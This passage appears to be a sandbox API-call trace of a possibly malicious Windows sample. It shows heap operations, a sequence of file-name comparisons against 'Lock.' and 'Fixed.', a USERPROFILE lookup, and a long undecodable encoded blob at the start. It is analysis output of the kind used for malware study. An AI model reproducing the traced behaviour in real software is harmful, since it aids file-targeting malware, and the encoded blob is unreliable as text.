lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0223.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38545d8 | out: hHeap=0x2af0000) returned 1 [0223.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0223.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0223.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0223.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0223.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0223.044] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0223.044] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.044] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0223.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0223.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0223.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0223.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0223.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0223.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0223.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0223.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0223.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0223.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0223.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0223.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0223.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_wc0ld1_h 9LSGLE.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0223.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wc0ld1_h 9LSGLE.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0223.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c0ld1_h 9LSGLE.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0223.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ld1_h 9LSGLE.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0223.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ld1_h 9LSGLE.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0223.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d1_h 9LSGLE.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0223.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1_h 9LSGLE.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0223.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_h 9LSGLE.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0223.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h 9LSGLE.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0223.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 9LSGLE.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0223.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9LSGLE.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0223.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LSGLE.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0223.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SGLE.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0223.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GLE.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0223.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LE.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0223.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0223.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0223.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0223.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0223.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0223.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0223.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0223.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0223.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0223.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0223.046] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0223.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0223.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0223.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0223.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0223.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0223.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0223.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0223.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0223.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0223.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0223.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0223.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0223.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0223.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0223.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0223.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0223.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0223.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2c) returned 0x2a73568 [0223.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0223.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_wc0ld1_h 9LSGLE.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0223.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wc0ld1_h 9LSGLE.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0223.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c0ld1_h 9LSGLE.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0223.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ld1_h 9LSGLE.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0223.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ld1_h 9LSGLE.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0223.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d1_h 9LSGLE.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0223.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1_h 9LSGLE.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0223.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_h 9LSGLE.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0223.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h 9LSGLE.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0223.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 9LSGLE.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0223.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9LSGLE.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0223.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LSGLE.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0223.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SGLE.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0223.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GLE.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0223.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LE.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0223.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0223.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0223.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a734f8 [0223.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0223.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a734f8 | out: hHeap=0x2af0000) returned 1 [0223.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0223.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0223.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0223.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0223.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0223.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0223.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0223.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0223.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0223.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0223.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0223.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0223.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0223.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0223.048] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0223.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0223.048] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0223.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0223.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0223.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0223.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722f8 [0223.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0223.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0223.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0223.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0223.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0223.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0223.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0223.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0223.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0223.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0223.049] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0223.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0223.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0223.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab020 [0223.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0223.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0223.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab098 [0223.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0223.049] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0223.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0223.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0223.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0223.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0223.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0223.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0223.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0223.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0223.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0223.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0223.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0223.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0223.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0223.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0223.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0223.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0223.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854e48 [0223.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0223.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0223.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0223.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0223.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0223.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0223.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0223.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0223.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0223.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0223.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0223.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721f8 [0223.050] RtlAllocateHeap 